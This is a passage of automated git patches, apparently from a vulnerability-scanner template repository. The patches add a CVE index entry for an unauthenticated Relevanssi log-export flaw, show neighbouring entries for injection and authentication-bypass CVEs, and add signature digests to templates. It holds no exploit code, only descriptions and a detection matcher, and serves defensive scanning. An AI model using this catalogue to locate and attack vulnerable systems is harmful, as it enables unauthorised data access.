ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:aff5e83e62003a482a3e2fd3953540715cbe5809 +templates-checksum.txt:a7ba8f07f5d0a8cf90eef9e1f5390b27416523f9 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From ec057054d9555d1b3e2b2fb8401275fe76c3becd Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Wed, 5 Jun 2024 08:12:44 +0000 Subject: [PATCH 1767/1768] Auto Generated cves.json [Wed Jun 5 08:12:44 UTC 2024] :robot: --- cves.json | 1 + cves.json-checksum.txt | 2 +- 2 files changed, 2 insertions(+), 1 deletion(-) diff --git a/cves.json b/cves.json index 5c9f03048a..027b2bde54 100644 --- a/cves.json +++ b/cves.json @@ -2364,6 +2364,7 @@ {"ID":"CVE-2024-1209","Info":{"Name":"LearnDash LMS \u003c 4.10.2 - Sensitive Information Exposure via assignments","Severity":"medium","Description":"The LearnDash LMS plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 4.10.1 via direct file access due to insufficient protection of uploaded assignments. This makes it possible for unauthenticated attackers to obtain those uploads.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2024/CVE-2024-1209.yaml"} {"ID":"CVE-2024-1210","Info":{"Name":"LearnDash LMS \u003c 4.10.2 - Sensitive Information Exposure","Severity":"medium","Description":"The LearnDash LMS plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 4.10.1 via API. This makes it possible for unauthenticated attackers to obtain access to quizzes.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2024/CVE-2024-1210.yaml"} {"ID":"CVE-2024-1212","Info":{"Name":"Progress Kemp LoadMaster - Command Injection","Severity":"critical","Description":"Unauthenticated remote attackers can access the system through the LoadMaster management interface, enabling arbitrary system command execution.\n","Classification":{"CVSSScore":"10"}},"file_path":"http/cves/2024/CVE-2024-1212.yaml"} +{"ID":"CVE-2024-1380","Info":{"Name":"Relevanssi (A Better Search) \u003c= 4.22.0 - Query Log Export","Severity":"medium","Description":"The Relevanssi Search plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check in all versions up to, and including, 4.22.0. This makes it possible for unauthenticated attackers to export the query log data.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2024/CVE-2024-1380.yaml"} {"ID":"CVE-2024-1561","Info":{"Name":"Gradio Applications - Local File Read","Severity":"high","Description":"Local file read by calling arbitrary methods of Components class\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2024/CVE-2024-1561.yaml"} {"ID":"CVE-2024-1698","Info":{"Name":"NotificationX \u003c= 2.8.2 - SQL Injection","Severity":"critical","Description":"The NotificationX - Best FOMO, Social Proof, WooCommerce Sales Popup \u0026 Notification Bar Plugin With Elementor plugin for WordPress is vulnerable to SQL Injection via the 'type' parameter in all versions up to, and including, 2.8.2 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-1698.yaml"} {"ID":"CVE-2024-1709","Info":{"Name":"ConnectWise ScreenConnect 23.9.7 - Authentication Bypass","Severity":"critical","Description":"ConnectWise ScreenConnect 23.9.7 and prior are affected by an Authentication Bypass Using an Alternate Path or Channel vulnerability, which may allow an attacker direct access to confidential information or critical systems.\n","Classification":{"CVSSScore":"10"}},"file_path":"http/cves/2024/CVE-2024-1709.yaml"} diff --git a/cves.json-checksum.txt b/cves.json-checksum.txt index 16dc2bfc76..a6bfebd6fa 100644 --- a/cves.json-checksum.txt +++ b/cves.json-checksum.txt @@ -1 +1 @@ -7bfe54c4491f1002937ca044e92d59d7 +b850ce0a43b8e25fcc5d4b47a2edd438 From 99034eaadafdc7eca1bb3efc1a08d8c63fccef0d Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Wed, 5 Jun 2024 08:13:36 +0000 Subject: [PATCH 1768/1768] Auto Template Signing [Wed Jun 5 08:13:36 UTC 2024] :robot: --- http/cves/2024/CVE-2024-1380.yaml | 1 + http/technologies/tech-detect.yaml | 2 +- 2 files changed, 2 insertions(+), 1 deletion(-) diff --git a/http/cves/2024/CVE-2024-1380.yaml b/http/cves/2024/CVE-2024-1380.yaml index 5a444936cd..eec639a063 100644 --- a/http/cves/2024/CVE-2024-1380.yaml +++ b/http/cves/2024/CVE-2024-1380.yaml @@ -38,3 +38,4 @@ http: - 'status_code == 200' - 'contains_all(header, "filename=relevanssi_log.csv", "application/download")' condition: and +# digest: 490a0046304402201272337c67a76b0203bc4aa653c317274fe8d6ad7253b664b827e1212dcc356202203920d9d81cf38c7d9c21315f113b82e9fdea0ff67cd19a6b5abf232ae55b2dda:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/tech-detect.yaml b/http/technologies/tech-detect.yaml index 66215090c1..f2fb4138a7 100644 --- a/http/technologies/tech-detect.yaml +++ b/http/technologies/tech-detect.yaml @@ -3741,4 +3741,4 @@ http: words: - "X-ClickHouse-Summary" case-insensitive: true -# digest: 490a0046304402206435742292b7b33283b264123be82c44d4f4102132875d35561296cd0c603c9d02202578a061dcb35c3284cadf8c815d7831fce13d645643c27a1fcd779925f0e56c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220335ffdf06e8ba346d7f25bf71fe8261bb434d46c19271b7b5601a8904de6555f0221009fb1d6c0e83f0fb6d88dc2a05c80f15750ed9ff0c0b2c19a51e0983ddfbdb5cb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file